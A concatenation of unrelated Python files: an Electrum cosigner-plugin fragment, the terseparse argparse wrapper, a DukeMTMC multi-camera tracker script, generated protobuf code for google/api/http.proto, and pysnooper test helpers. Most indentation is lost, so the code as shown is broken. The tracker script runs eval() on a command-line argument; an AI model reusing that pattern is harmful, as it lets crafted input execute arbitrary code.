self.on_receive(window, keyhash, message) # try again
return
try:
k = bh2u(bitcoin.deserialize_xprv(xprv)[-1])
EC = bitcoin.EC_KEY(bfh(k))
message = bh2u(EC.decrypt_message(message))
except Exception as e:
traceback.print_exc(file=sys.stdout)
window.show_error(repr(e))
return
state.listener.clear(keyhash)
tx = transaction.Transaction(message)
show_transaction(tx, window, prompt_if_unsaved=True)
|
|
"""Terse command-line parser wrapper around ArgumentParser
Example Usage:
# First example is the equivalent version of an example from the
# argparse docs
p = Parser(
'cmd', 'Process some integers',
Arg('integers', 'an integer for the accumulator',
metavar='N', type=int, nargs='+'),
Arg('--sum', 'sum the integers (default: find the max)',
dest='accumulate', action='store_const',
const=sum, default=max))
args = p.parse_args('1 2 3 4'.split())
Changes from argparse are as follows:
* All arguments and parsers require documentation strings
* A composable syntax for constructing parsers
* Some default types are provided with user friendly error messages
* Metavars are created automatically and provide type information
* SubParser names and descriptions are displayed in help
* SubParsers support common arguments. Arguments in SubParsers are added
to all parsers within the SubParsers instance.
* Debugging information can be enabled with '--terseparse-debug' as first argument
"""
from argparse import SUPPRESS
import six
import sys
import warnings
from terseparse.root_parser import RootParser
class KW(object):
"""Holds keyword arguments for Parser objects.
Due to the composable style for building parsers and the requirement of
language that positional arguments are not allowed after keyword arguments,
this class is used to pass keyword arguments to parsers.
>>> parser = Parser('name', 'description', KW(epilog='epilog'))
"""
def __init__(self, **kwargs):
self.kwargs = kwargs
def __call__(self, parser):
return parser
class AbstractParser(object):
"""ABC for Parser objects.
Parser objects can hold Arg and SubParsers.
Do not update any instance local state outside of init.
"""
def __init__(self, name, description, *args):
self._name = name
self._description = description
self._args = []
self._kwargs = {}
for arg in args:
if isinstance(arg, KW):
self._kwargs.update(arg.kwargs)
else:
self._args.append(arg)
self._kwargs['description'] = description
self.epilog = self._kwargs.pop('epilog', '')
self._init()
def _init(self):
"""Subclass init method"""
pass
def __call__(self, parser, **kwargs):
return self._build(parser, self._updated_kwargs(kwargs))
def _updated_kwargs(self, kwargs):
return dict(list(self._kwargs.items()) + list(kwargs.items()))
def _build(self, **kwargs):
        raise NotImplementedError()
@property
def name(self):
return self._name
@property
def description(self):
return self._description
@property
def args(self):
return iter(self._args)
class Parser(AbstractParser):
def _init(self):
self._subparser = None
for arg in self.args:
if isinstance(arg, SubParsers):
assert self._subparser is None, (
'Only one SubParsers can be added '
'(argparse only allows one subparser)')
self._subparser = arg
def _build(self, parser, kwargs):
p = parser.add_parser(self.name, **kwargs)
for arg in self.args:
arg(p)
return p
@property
def subparser(self):
return self._subparser
def subparsers_summary(self, spacing=2):
if not self.subparser or not self.subparser.parsers:
return ''
parsers = self.subparser.parsers
name_width = max(len(p.name) for p in parsers) + spacing
args = ' '.join('{}'.format(a.name) for a in self.subparser.args)
msg = ''
spacer = ' ' * spacing
if parsers:
msg = 'commands: {}\n'.format(self.subparser.description)
msg += spacer + 'usage: {} {{{}}} {} ...\n\n'.format(
self.name, self.subparser.name, args)
for p in parsers:
msg += '{}{:{}} {}\n'.format(
spacer,
p.name, name_width,
p.description)
return msg
def parse_args(self, args=None, namespace=None, defaults=None):
"""Parse args, returns a tuple of a parser and ParsedArgs object
Args:
args -- sequence of strings representing the arguments to parse
namespace -- object to use for holding arguments
defaults -- lazily loaded dict like object of default arguments
Returns: (parser, ParsedArgs)
            parser supports an .error(message) method for displaying an error and exiting with usage
If a default key is callable then it is called with the current namespace,
and then returned.
"""
epilog = self.subparsers_summary()
epilog += self.epilog
return self(RootParser, epilog=epilog).parse_args(args, namespace, defaults)
class SubParsers(AbstractParser):
"""SubParsers are used for holding other Parsers.
They are the building block of sub-commands.
"""
def _init(self):
self._parsers = []
args = []
for arg in self.args:
if isinstance(arg, Arg):
args.append(arg)
elif isinstance(arg, Parser):
self._parsers.append(arg)
else:
assert False, 'Unknown builder type {!r}'.format(type(arg))
self._args = args
for parser in self.parsers:
parser._args = self._args + parser._args
def _build(self, parser, kwargs):
# python 2-3 compatible change
# see https://stackoverflow.com/a/22994500/9899650
if "dest" not in kwargs:
kwargs["dest"] = self._name
sp = parser.add_subparsers(title=self.name, **kwargs)
# python 2-3 compatible change
# see https://stackoverflow.com/a/23354355/9899650
if "required" not in kwargs:
sp.required = True
for parser in self.parsers:
parser(sp)
return sp
@property
def parsers(self):
return list(self._parsers)
class Group(object):
def __init__(self, title, description, *args):
self.title = title
self.description = description
self.args = []
self._kwargs = {}
for arg in args:
if isinstance(arg, KW):
self._kwargs.update(arg.kwargs)
else:
self.args.append(arg)
def __call__(self, parser):
grp = parser.add_argument_group(self.title, self.description)
for arg in self.args:
arg(grp, **self._kwargs)
return grp
class Arg(object):
"""Arg wraps parser.add_arguments
This class will pass all kwargs to the add_arguments call
"""
def __init__(self, name, help=None, type=None, default=None, hidden=False,
**kwargs):
self.name = name
self.help = help
self.type = type
self.default = default
self.hidden = hidden
self.kwargs = kwargs
def __call__(self, parser, **_kwargs):
kwargs = self.kwargs.copy()
if self.type:
kwargs['type'] = self.type
if self.help:
if self.type:
type_str = '<{}>'.format(str(self.type))
kwargs['help'] = type_str + ' ' + self.help
else:
kwargs['help'] = self.help
for k, v in _kwargs.items():
kwargs[k] = v
if self.hidden:
kwargs['help'] = SUPPRESS
kwargs['default'] = self.default
if isinstance(self.name, six.string_types):
names = [self.name]
else:
names = self.name
action = parser.add_argument(*names, **kwargs)
if action.nargs != 0:
if self.type:
type_str = '<{}>'.format(str(self.type))
if action.option_strings != []:
action.metavar = type_str
else:
action.metavar = action.dest
action.dest = action.dest.replace('-', '_')
return parser
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-.
from __future__ import print_function
from __future__ import division
import argparse
from os.path import join as pjoin
from os import makedirs
import time, datetime
# the usual suspects
import h5py
import numpy as np
import matplotlib as mpl
mpl.use('Agg')
#mpl.use('GTK')
import matplotlib.pyplot as plt
import matplotlib.patches as patches
from mpl_toolkits.axes_grid1 import ImageGrid
#tracker stuff
import lib
from track import Track
from fakenews import FakeNeuralNewsNetwork
from semifake import SemiFakeNews
#from neural import RealNews
SEQ_FPS = 60.0
SEQ_DT = 1./SEQ_FPS
SEQ_SHAPE = (1080, 1920)
STATE_SHAPE = (135, 240) # Heatmaps: (26, 58) -> (33, 60)
STATE_PADDING = ((5,5), (10,10)) # state shape is this much larger on the sides, see np.pad.
g_frames = 0 # Global counter for correct FPS in all cases
try:
profile
except NameError:
def profile(f):
return f
def n_active_tracks(tracklist):
return '{:2d} +{:2d} +{:2d} ={:2d}'.format(
sum(t.status == 'matched' for t in tracklist),
sum(t.status == 'missed' for t in tracklist),
sum(t.status == 'init' for t in tracklist),
len(tracklist),
)
# from collections import Counter
#return str(Counter(t.status for t in tracklist).most_common())
def shall_vis(args, curr_frame):
return args.vis and (curr_frame - args.t0) % args.vis == 0
@lib.lru_cache(maxsize=16) # In theory 1 is enough here, but whatever =)
def get_image(basedir, icam, frame):
#framedir = 'frames-0.5' if SCALE_FACTOR == 0.5 else 'frames'
# TODO: Use basedir again, from args.
return plt.imread(pjoin('/work3/beyer/', 'frames-0.5', 'camera{}/{}.jpg'.format(icam, lib.glob2loc(frame, icam))))
@profile
def main(net, args):
eval_path = pjoin(args.outdir, 'results/run_{:%Y-%m-%d_%H:%M:%S}.txt'.format(datetime.datetime.now()))
debug_dir = None
if args.debug:
debug_dir = pjoin(args.outdir, 'debug/run_{:%Y-%m-%d_%H:%M:%S}'.format(datetime.datetime.now()))
makedirs(pjoin(debug_dir, 'crops'), exist_ok=True)
track_lists = [[] for _ in args.cams]
track_id = 1
# Open embedding cache
if args.embcache is not None:
embs_caches = [h5py.File(args.embcache.format(icam), 'r')['embs'] for icam in args.cams]
else:
embs_caches = [None]*len(args.cams)
# ===Tracking fun begins: iterate over frames===
# TODO: global time (duke)
for curr_frame in range(args.t0, args.t1+1):
print("\rFrame {}, {} matched/missed/init/total tracks, {} total seen".format(curr_frame, ', '.join(map(n_active_tracks, track_lists)), sum(map(len, track_lists))), end='', flush=True)
net.tick(curr_frame)
for icam, track_list, embs_cache in zip(args.cams, track_lists, embs_caches):
net.fake_camera(icam)
image_getter = lambda: get_image(args.basedir, icam, curr_frame)
# Either embed the image, or load embedding from cache.
if embs_cache is not None:
image_embedding = np.array(embs_cache[curr_frame-127720]) # That's where the cache starts!
else:
image_embedding = net.embed_images([image_getter()])[0]
# ===visualization===
# First, plot what data we have before doing anything.
if shall_vis(args, curr_frame):
#fig, axes = plt.subplots(3, 2, sharex=True, sharey=True, figsize=(20,12))
#(ax_tl, ax_tr), (ax_ml, ax_mr), (ax_bl, ax_br) = axes
fig, axes = plt.subplots(2, 2, sharex=True, sharey=True, figsize=(20,12))
(ax_ml, ax_mr), (ax_bl, ax_br) = axes
axes = axes.flatten()
for ax in axes:
ax.imshow(image_getter(), extent=[0, SEQ_SHAPE[1], SEQ_SHAPE[0], 0])
# plot (active) tracks
#ax_tl.set_title('Raw Personness')
#ax_tr.set_title('Filtered Personness')
ax_ml.set_title('Prior')
ax_mr.set_title('All ID-specific')
ax_bl.set_title('Posterior')
ax_br.set_title('All Tracks')
# ===/visualization===
### A) update existing tracks
for itracker, track in enumerate(track_list):
# ---PREDICT---
track.track_predict()
if shall_vis(args, curr_frame):
track.plot_pred_heatmap(ax_ml)
# ---SEARCH---
id_distmap = net.search_person(image_embedding, track.embedding, T=1,
fake_track_id=track.track_id) # Unused by real net.
# FIXME: should be image.shape, or at least use scale-factor.
id_distmap = net.fix_shape(id_distmap, (1080//2, 1920//2), STATE_SHAPE, fill_value=1/np.prod(STATE_SHAPE))
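                # softmin turns the distance map into a (roughly normalized)
                # probability heatmap: small distances get large weights.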
id_heatmap = lib.softmin(id_distmap, T=1)
#id_heatmap /= np.sum(id_heatmap)
# ---UPDATE---
track.track_update(id_heatmap, id_distmap, curr_frame, image_getter)
if shall_vis(args, curr_frame):
track.plot_id_heatmap(ax_mr)
### B) get new tracks from general heatmap
viz_per_cam_personnesses = []
#known_embs = [track.embedding for track in track_lists[icam-1]]
#personness = net.clear_known(image_personnesses[icam-1], image_embeddings[icam-1], known_embs=known_embs)
#personness = net.fix_shape(personness, images[icam-1].shape, STATE_SHAPE, fill_value=0)
#viz_per_cam_personnesses.append(personness)
# B.1) COMMENT IN FOR SEMI-FAKE
# TODO: Make semi-fake by generating heatmap and clearing out known_embs
# TODO: use image instead of None for real one here
for (new_heatmap, init_pose), new_id in net.personness(None, known_embs=None, return_pose=True):
# TODO: get correct track_id (loop heatmap, instead of function call?# )
# TODO: get id_heatmap of that guy for init_heatmap
# Don't fix shape yet, cuz we don't emulate the avg-pool shape screw-up.
#new_heatmap = net.fix_shape(new_heatmap, images[icam-1].shape, STATE_SHAPE, fill_value=0)
#init_pose = lib.argmax2d_xy(new_heatmap)
new_track = Track(net.embed_crops,
curr_frame, init_pose, image_getter(), track_id=new_id,
state_shape=STATE_SHAPE, state_pad=STATE_PADDING, output_shape=SEQ_SHAPE,
dist_thresh=args.dist_thresh, entropy_thresh=args.ent_thresh,
unmiss_thresh=args.unmiss_thresh, delete_thresh=args.delete_thresh,
maxlife=args.maxlife, tp_hack=args.tp_hack,
debug_out_dir=debug_dir)
new_track.init_heatmap(new_heatmap)
#new_track.init_heatmap(np.full(STATE_SHAPE, 1/np.prod(STATE_SHAPE)))
track_list.append(new_track)
# B.2) REAL NEWS
# TODO: Missing non-max suppression
# for y_idx, x_idx in zip(*np.where(personness>1.5)):
# init_pose = [y_idx, x_idx]
# new_track = Track(net.embed_crop, SEQ_DT,
# curr_frame, init_pose, images[icam-1], track_id=track_id,
# state_shape=STATE_SHAPE, output_shape=SEQ_SHAPE,
# debug_out_dir=debug_dir)
# # Embed around the initial pose and compute an initial heatmap.
# id_heatmap = net.search_person(image_embeddings[icam-1], new_track.embedding)
# id_heatmap = net.fix_shape(id_heatmap, images[icam-1].shape, STATE_SHAPE, fill_value=0)
# new_track.init_heatmap(id_heatmap)
# track_id += 1
# track_list.append(new_track)
if shall_vis(args, curr_frame):
for track in track_list:
track.plot_pos_heatmap(ax_bl)
track.plot_track(ax_br, plot_past_trajectory=True, time_scale=args.vis)
for ax in axes:
# TODO: Flex
ax.set_adjustable('box-forced')
ax.set_xlim(0, SEQ_SHAPE[1])
ax.set_ylim(SEQ_SHAPE[0], 0)
fig.savefig(pjoin(args.outdir, 'camera{}/res_img_{:06d}.jpg'.format(icam, curr_frame)),
quality=80, bbox_inches='tight', pad_inches=0.2)
plt.close()
### C) further track-management
# delete tracks marked as 'deleted' in this tracking cycle #TODO: manage in other list for re-id
track_list[:] = [i for i in track_list if i.status != 'deleted']
# ==evaluation===
with open(eval_path, 'a') as eval_file:
for icam, track_list in zip(args.cams, track_lists):
for track in track_list:
track_eval_line = track.get_track_eval_line(cid=icam, frame=curr_frame)
eval_file.write('{} {} {} {} {} {} {} {} {}\n'.format(*track_eval_line))
global g_frames
g_frames += 1
# Heavily adapted and fixed from http://robotics.usc.edu/~ampereir/wordpress/?p=626
def savefig(fname, fig=None, orig_size=None, **kw):
if fig is None:
fig = plt.gcf()
fig.patch.set_alpha(0)
w, h = fig.get_size_inches()
if orig_size is not None: # Aspect ratio scaling if required
fw, fh = w, h
w, h = orig_size
fig.set_size_inches((fw, (fw/w)*h))
fig.set_dpi((fw/w)*fig.get_dpi())
ax = fig.gca()
ax.set_frame_on(False)
ax.set_xticks([]); ax.set_yticks([])
ax.set_axis_off()
#ax.set_xlim(0, w); ax.set_ylim(h, 0)
fig.savefig(fname, transparent=True, bbox_inches='tight', pad_inches=0, **kw)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='2D tracker test.')
parser.add_argument('--basedir', nargs='?', default='/work/breuers/dukeMTMC/',
help='Path to `train` folder of 2DMOT2015.')
parser.add_argument('--outdir', nargs='?', default='/home/breuers/results/duke_mtmc/',
help='Where to store generated output. Only needed if `--vis` is also passed.')
parser.add_argument('--model', default='lunet2c',
help='Name of the model to load. Corresponds to module names in lib/models. Or `fake`')
parser.add_argument('--weights', default='/work/breuers/dukeMTMC/models/lunet2c-noscale-nobg-2to32-aug.pkl',
help='Name of the weights to load for the model (path to .pkl file).')
parser.add_argument('--t0', default=127720, type=int,
help='Time of first frame.')
parser.add_argument('--t1', default=187540, type=int,
help='Time of last frame, inclusive.')
parser.add_argument('--large_gpu', action='store_true',
help='Large GPU can forward more at once.')
parser.add_argument('--vis', default=0, type=int,
help='Generate and save visualization of the results, every X frame.')
parser.add_argument('--debug', action='store_true',
help='Generate extra many debugging outputs (in outdir).')
parser.add_argument('--cams', default='1,2,3,4,5,6,7,8',
help='Array of cameras numbers (1-8) to consider.')
parser.add_argument('--embcache',
help='Optional path to embeddings-cache file for speeding things up. Put a `{}` as placeholder for camera-number.')
parser.add_argument('--dist_thresh', default=7, type=float,
                        help='Distance threshold to evaluate measurement certainty.')
parser.add_argument('--ent_thresh', default=0.1, type=float,
                        help='Entropy threshold to evaluate measurement certainty.')
parser.add_argument('--maxlife', type=int)
parser.add_argument('--tp_hack', type=float)
parser.add_argument('--unmiss_thresh', type=int, default=2)
parser.add_argument('--delete_thresh', type=int, default=90)
args = parser.parse_args()
args.cams = eval('[' + args.cams + ']')
print(args)
# This is all for faking the network.
if args.model == 'fake':
net = FakeNeuralNewsNetwork(lib.load_trainval(pjoin(args.basedir, 'ground_truth', 'trainval.mat'), time_range=[args.t0, args.t1]))
else:
#net = RealNews(
net = SemiFakeNews(
model=args.model,
weights=args.weights,
input_scale_factor=1.0,
fake_dets=lib.load_trainval(pjoin(args.basedir, 'ground_truth', 'trainval.mat'), time_range=[args.t0, args.t1]),
fake_shape=STATE_SHAPE,
)
# Prepare output dirs
for icam in args.cams:
makedirs(pjoin(args.outdir, 'camera{}'.format(icam)), exist_ok=True)
makedirs(pjoin(args.outdir, 'results'), exist_ok=True)
tstart = time.time()
try:
main(net, args)
except KeyboardInterrupt:
print()
print('FPS: {:.3f}'.format(g_frames / (time.time() - tstart)))
|
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/api/http.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/api/http.proto',
package='google.api',
syntax='proto3',
serialized_options=_b('\n\016com.google.apiB\tHttpProtoP\001ZAgoogle.golang.org/genproto/googleapis/api/annotations;annotations\370\001\001\242\002\004GAPI'),
serialized_pb=_b('\n\x15google/api/http.proto\x12\ngoogle.api\"T\n\x04Http\x12#\n\x05rules\x18\x01 \x03(\x0b\x32\x14.google.api.HttpRule\x12\'\n\x1f\x66ully_decode_reserved_expansion\x18\x02 \x01(\x08\"\x81\x02\n\x08HttpRule\x12\x10\n\x08selector\x18\x01 \x01(\t\x12\r\n\x03get\x18\x02 \x01(\tH\x00\x12\r\n\x03put\x18\x03 \x01(\tH\x00\x12\x0e\n\x04post\x18\x04 \x01(\tH\x00\x12\x10\n\x06\x64\x65lete\x18\x05 \x01(\tH\x00\x12\x0f\n\x05patch\x18\x06 \x01(\tH\x00\x12/\n\x06\x63ustom\x18\x08 \x01(\x0b\x32\x1d.google.api.CustomHttpPatternH\x00\x12\x0c\n\x04\x62ody\x18\x07 \x01(\t\x12\x15\n\rresponse_body\x18\x0c \x01(\t\x12\x31\n\x13\x61\x64\x64itional_bindings\x18\x0b \x03(\x0b\x32\x14.google.api.HttpRuleB\t\n\x07pattern\"/\n\x11\x43ustomHttpPattern\x12\x0c\n\x04kind\x18\x01 \x01(\t\x12\x0c\n\x04path\x18\x02 \x01(\tBj\n\x0e\x63om.google.apiB\tHttpProtoP\x01ZAgoogle.golang.org/genproto/googleapis/api/annotations;annotations\xf8\x01\x01\xa2\x02\x04GAPIb\x06proto3')
)
_HTTP = _descriptor.Descriptor(
name='Http',
full_name='google.api.Http',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='rules', full_name='google.api.Http.rules', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='fully_decode_reserved_expansion', full_name='google.api.Http.fully_decode_reserved_expansion', index=1,
number=2, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=37,
serialized_end=121,
)
_HTTPRULE = _descriptor.Descriptor(
name='HttpRule',
full_name='google.api.HttpRule',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='selector', full_name='google.api.HttpRule.selector', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='get', full_name='google.api.HttpRule.get', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='put', full_name='google.api.HttpRule.put', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='post', full_name='google.api.HttpRule.post', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='delete', full_name='google.api.HttpRule.delete', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='patch', full_name='google.api.HttpRule.patch', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom', full_name='google.api.HttpRule.custom', index=6,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='body', full_name='google.api.HttpRule.body', index=7,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='response_body', full_name='google.api.HttpRule.response_body', index=8,
number=12, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='additional_bindings', full_name='google.api.HttpRule.additional_bindings', index=9,
number=11, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='pattern', full_name='google.api.HttpRule.pattern',
index=0, containing_type=None, fields=[]),
],
serialized_start=124,
serialized_end=381,
)
_CUSTOMHTTPPATTERN = _descriptor.Descriptor(
name='CustomHttpPattern',
full_name='google.api.CustomHttpPattern',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='kind', full_name='google.api.CustomHttpPattern.kind', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='path', full_name='google.api.CustomHttpPattern.path', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=383,
serialized_end=430,
)
_HTTP.fields_by_name['rules'].message_type = _HTTPRULE
_HTTPRULE.fields_by_name['custom'].message_type = _CUSTOMHTTPPATTERN
_HTTPRULE.fields_by_name['additional_bindings'].message_type = _HTTPRULE
_HTTPRULE.oneofs_by_name['pattern'].fields.append(
_HTTPRULE.fields_by_name['get'])
_HTTPRULE.fields_by_name['get'].containing_oneof = _HTTPRULE.oneofs_by_name['pattern']
_HTTPRULE.oneofs_by_name['pattern'].fields.append(
_HTTPRULE.fields_by_name['put'])
_HTTPRULE.fields_by_name['put'].containing_oneof = _HTTPRULE.oneofs_by_name['pattern']
_HTTPRULE.oneofs_by_name['pattern'].fields.append(
_HTTPRULE.fields_by_name['post'])
_HTTPRULE.fields_by_name['post'].containing_oneof = _HTTPRULE.oneofs_by_name['pattern']
_HTTPRULE.oneofs_by_name['pattern'].fields.append(
_HTTPRULE.fields_by_name['delete'])
_HTTPRULE.fields_by_name['delete'].containing_oneof = _HTTPRULE.oneofs_by_name['pattern']
_HTTPRULE.oneofs_by_name['pattern'].fields.append(
_HTTPRULE.fields_by_name['patch'])
_HTTPRULE.fields_by_name['patch'].containing_oneof = _HTTPRULE.oneofs_by_name['pattern']
_HTTPRULE.oneofs_by_name['pattern'].fields.append(
_HTTPRULE.fields_by_name['custom'])
_HTTPRULE.fields_by_name['custom'].containing_oneof = _HTTPRULE.oneofs_by_name['pattern']
DESCRIPTOR.message_types_by_name['Http'] = _HTTP
DESCRIPTOR.message_types_by_name['HttpRule'] = _HTTPRULE
DESCRIPTOR.message_types_by_name['CustomHttpPattern'] = _CUSTOMHTTPPATTERN
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Http = _reflection.GeneratedProtocolMessageType('Http', (_message.Message,), dict(
DESCRIPTOR = _HTTP,
__module__ = 'google.api.http_pb2'
# @@protoc_insertion_point(class_scope:google.api.Http)
))
_sym_db.RegisterMessage(Http)
HttpRule = _reflection.GeneratedProtocolMessageType('HttpRule', (_message.Message,), dict(
DESCRIPTOR = _HTTPRULE,
__module__ = 'google.api.http_pb2'
# @@protoc_insertion_point(class_scope:google.api.HttpRule)
))
_sym_db.RegisterMessage(HttpRule)
CustomHttpPattern = _reflection.GeneratedProtocolMessageType('CustomHttpPattern', (_message.Message,), dict(
DESCRIPTOR = _CUSTOMHTTPPATTERN,
__module__ = 'google.api.http_pb2'
# @@protoc_insertion_point(class_scope:google.api.CustomHttpPattern)
))
_sym_db.RegisterMessage(CustomHttpPattern)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
|
|
# Copyright 2019 Ram Rachum and collaborators.
# This program is distributed under the MIT license.
import os
import re
import abc
import inspect
import sys
from pysnooper.utils import DEFAULT_REPR_RE
try:
from itertools import zip_longest
except ImportError:
from itertools import izip_longest as zip_longest
from . import mini_toolbox
import pysnooper.pycompat
def get_function_arguments(function, exclude=()):
try:
getfullargspec = inspect.getfullargspec
except AttributeError:
result = inspect.getargspec(function).args
else:
result = getfullargspec(function).args
for exclude_item in exclude:
result.remove(exclude_item)
return result
class _BaseEntry(pysnooper.pycompat.ABC):
def __init__(self, prefix='', min_python_version=None, max_python_version=None):
self.prefix = prefix
self.min_python_version = min_python_version
self.max_python_version = max_python_version
@abc.abstractmethod
def check(self, s):
pass
def is_compatible_with_current_python_version(self):
compatible = True
if self.min_python_version and self.min_python_version > sys.version_info:
compatible = False
if self.max_python_version and self.max_python_version < sys.version_info:
compatible = False
return compatible
def __repr__(self):
init_arguments = get_function_arguments(self.__init__,
exclude=('self',))
attributes = {
key: repr(getattr(self, key)) for key in init_arguments
if getattr(self, key) is not None
}
return '%s(%s)' % (
type(self).__name__,
', '.join('{key}={value}'.format(**locals()) for key, value
in attributes.items())
)
class _BaseValueEntry(_BaseEntry):
def __init__(self, prefix='', min_python_version=None,
max_python_version=None):
_BaseEntry.__init__(self, prefix=prefix,
min_python_version=min_python_version,
max_python_version=max_python_version)
self.line_pattern = re.compile(
r"""^%s(?P<indent>(?: {4})*)(?P<preamble>[^:]*):"""
r"""\.{2,7} (?P<content>.*)$""" % (re.escape(self.prefix),)
)
@abc.abstractmethod
def _check_preamble(self, preamble):
pass
@abc.abstractmethod
def _check_content(self, preamble):
pass
def check(self, s):
match = self.line_pattern.match(s)
if not match:
return False
_, preamble, content = match.groups()
return (self._check_preamble(preamble) and
self._check_content(content))
class ElapsedTimeEntry(_BaseEntry):
def __init__(self, elapsed_time_value=None, tolerance=0.2, prefix='',
min_python_version=None, max_python_version=None):
_BaseEntry.__init__(self, prefix=prefix,
min_python_version=min_python_version,
max_python_version=max_python_version)
self.line_pattern = re.compile(
r"""^%s(?P<indent>(?: {4})*)Elapsed time: (?P<time>.*)""" % (
re.escape(self.prefix),
)
)
self.elapsed_time_value = elapsed_time_value
self.tolerance = tolerance
def check(self, s):
match = self.line_pattern.match(s)
if not match:
return False
timedelta = pysnooper.pycompat.timedelta_parse(match.group('time'))
if self.elapsed_time_value:
return abs(timedelta.total_seconds() - self.elapsed_time_value) \
<= self.tolerance
else:
return True
class CallEndedByExceptionEntry(_BaseEntry):
# Todo: Looking at this class, we could rework the hierarchy.
def __init__(self, prefix=''):
_BaseEntry.__init__(self, prefix=prefix)
def check(self, s):
return re.match(
r'''(?P<indent>(?: {4})*)Call ended by exception''',
s
)
class VariableEntry(_BaseValueEntry):
def __init__(self, name=None, value=None, stage=None, prefix='',
name_regex=None, value_regex=None, min_python_version=None,
max_python_version=None):
_BaseValueEntry.__init__(self, prefix=prefix,
min_python_version=min_python_version,
max_python_version=max_python_version)
if name is not None:
assert name_regex is None
if value is not None:
assert value_regex is None
assert stage in (None, 'starting', 'new', 'modified')
self.name = name
self.value = value
self.stage = stage
self.name_regex = (None if name_regex is None else
re.compile(name_regex))
self.value_regex = (None if value_regex is None else
re.compile(value_regex))
_preamble_pattern = re.compile(
r"""^(?P<stage>New|Modified|Starting) var$"""
)
def _check_preamble(self, preamble):
match = self._preamble_pattern.match(preamble)
if not match:
return False
stage = match.group('stage')
return self._check_stage(stage)
_content_pattern = re.compile(
r"""^(?P<name>.+?) = (?P<value>.+)$"""
)
def _check_content(self, content):
match = self._content_pattern.match(content)
if not match:
return False
name, value = match.groups()
return self._check_name(name) and self._check_value(value)
def _check_name(self, name):
if self.name is not None:
return name == self.name
elif self.name_regex is not None:
return self.name_regex.match(name)
else:
return True
def _check_value(self, value):
if self.value is not None:
return value == self.value
elif self.value_regex is not None:
return self.value_regex.match(value)
else:
return True
def _check_stage(self, stage):
stage = stage.lower()
if self.stage is None:
return stage in ('starting', 'new', 'modified')
else:
return stage == self.stage
